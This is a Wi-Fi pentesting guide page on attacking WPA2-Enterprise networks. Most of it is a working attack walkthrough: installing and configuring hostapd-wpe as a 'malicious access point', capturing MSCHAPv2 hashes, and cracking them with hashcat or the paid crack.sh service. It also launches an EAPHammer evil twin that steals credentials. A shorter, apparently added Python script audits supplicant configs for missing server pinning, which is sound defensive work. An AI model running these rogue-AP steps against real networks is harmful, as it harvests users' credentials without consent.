enterprise.md

File metadata and controls

95 lines (68 loc) · 2.39 KB

Enterprise

hostapd-wpe

1. Install the required dependencies:

sudo apt install hostapd-wpe libnl-3-dev libssl-dev

2. Edit the hostapd-wpe.conf file, making sure to change the ssid value:

nano /etc/hostapd-wpe/hostapd-wpe.conf

#
# hostapd-wpe.conf
# Brad Antoniewicz (@brad_anton) - Foundstone
# ------------------------------------------------
#
# Configuration file for hostapd-wpe
# 
# General Options - Likely to need to be changed if you're using this
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan0
# Driver - comment this out if 802.11
#driver=wired
# May have to change these depending on build location
eap_user_file=hostapd-wpe.eap_user
ca_cert=../../hostapd-wpe/certs/ca.pem
server_cert=../../hostapd-wpe/certs/server.pem
private_key=../../hostapd-wpe/certs/server.pem
private_key_passwd=whatever
dh_file=../../hostapd-wpe/certs/dh
# 802.11 Options - Uncomment all if 802.11
ssid=hostapd-wpe
hw_mode=g
channel=1

3. Kill problematic processes such as wpa_supplicant, which may interfere with our access point:

sudo airmon-ng check

4. We can then run our malicious access point and wait for connections:

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

5. Once a client connects, we can attempt to crack the captured hash using Hashcat (the hash file name below is a placeholder):

hashcat -m 5500 <captured-hash-file> -a 0 /usr/share/wordlists/rockyou.txt

6. If the hash cannot be cracked locally, it can be submitted to crack.sh and cracked for a fee:

{% embed url="https://crack.sh" %}

EAPHammer

{% embed url="https://github.com/s0lst1c3/eaphammer" %}

1. Clone eaphammer from the official repository:

git clone https://github.com/s0lst1c3/eaphammer.git

2. Run the kali-setup script:

./kali-setup

3. Finally, set up and run the credential-stealing evil twin attack against a WPA/2-EAP network:

# generate the certificate
./eaphammer --cert-wizard

# launch the attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid MaliciousAP --creds
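Both procedures above only work when the client accepts the rogue AP's certificate, so the practical defence is to pin the RADIUS server on every supplicant. The following audit script is an added example, not part of this page nor of hostapd-wpe or EAPHammer; the PIN_KEYS set, the sample configuration and the finding texts are assumptions of the example.

```python
# Added example, not from the original page: flag wpa_supplicant.conf blocks
# that a rogue AP presenting its own certificate could impersonate.
import re
# Any of these makes wpa_supplicant check *which* server presented the cert.
PIN_KEYS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")

def parse_networks(conf):
    """Return one dict of key=value pairs per network={...} block."""
    networks = []
    for body in re.findall(r"network\s*=\s*\{(.*?)\}", conf, re.S):
        net = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()          # drop comments
            if "=" in line:
                k, v = line.split("=", 1)
                net[k.strip()] = v.strip().strip('"')
        networks.append(net)
    return networks

def audit_network(net):
    """Return findings for one block; an empty list means the server is pinned."""
    findings = []
    if "WPA-EAP" not in net.get("key_mgmt", "").upper():
        return findings                                   # not an 802.1X network
    if "ca_cert" not in net:
        findings.append("no ca_cert: any server certificate is accepted")
    if not any(k in net for k in PIN_KEYS):
        findings.append("no server identity match: any cert from a trusted CA passes")
    if findings and "MSCHAPV2" in net.get("phase2", "").upper():
        findings.append("MSCHAPv2 response can be captured and cracked offline (hashcat -m 5500)")
    return findings

# Constructed sample: the first block trusts any server, the second pins it.
SAMPLE_CONF = """network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-wifi-pinned"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.example.com"
}
"""
```

Run `audit_network` over each block from `parse_networks` on a real supplicant config; any block that returns findings is one an evil twin with a self-signed certificate can harvest credentials from.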

References

{% embed url="https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html" %}

{% embed url="https://adam-toscher.medium.com/top-5-ways-i-gained-access-to-your-corporate-wireless-network-lo0tbo0ty-karma-edition-f72e7995aef2" %}

{% embed url="https://www.c0d3xpl0it.com/2017/03/enterprise-wifi-hacking-with-hostapd-wpe.html" %}